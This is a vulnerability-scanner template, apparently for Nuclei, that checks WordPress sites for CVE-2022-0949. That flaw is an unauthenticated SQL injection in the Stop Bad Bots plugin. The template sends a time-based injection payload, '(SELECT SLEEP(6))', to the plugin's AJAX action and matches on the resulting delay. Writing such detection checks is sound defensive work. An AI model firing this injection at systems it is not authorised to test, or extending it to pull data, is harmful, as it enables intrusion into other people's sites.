57 lines
1.8 KiB
YAML
57 lines
1.8 KiB
YAML
id: CVE-2022-0949
|
|
|
|
info:
|
|
name: WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 6.930 does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection.
|
|
remediation: Fixed in version 6.930
|
|
reference:
|
|
- https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb
|
|
- https://wordpress.org/plugins/stopbadbots/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0949
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-0949
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,stopbadbots,unauth
|
|
|
|
variables:
|
|
IP: '{{rand_ip("1.1.1.0/24")}}'
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Real-IP: {{IP}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=stopbadbots_grava_fingerprint&fingerprint=0
|
|
|
|
- |
|
|
@timeout 10s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Real-IP: {{IP}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))
|
|
|
|
- |
|
|
GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_2>=6'
|
|
- 'status_code_2 == 200'
|
|
- 'contains(body_3, "commentform")'
|
|
condition: and
|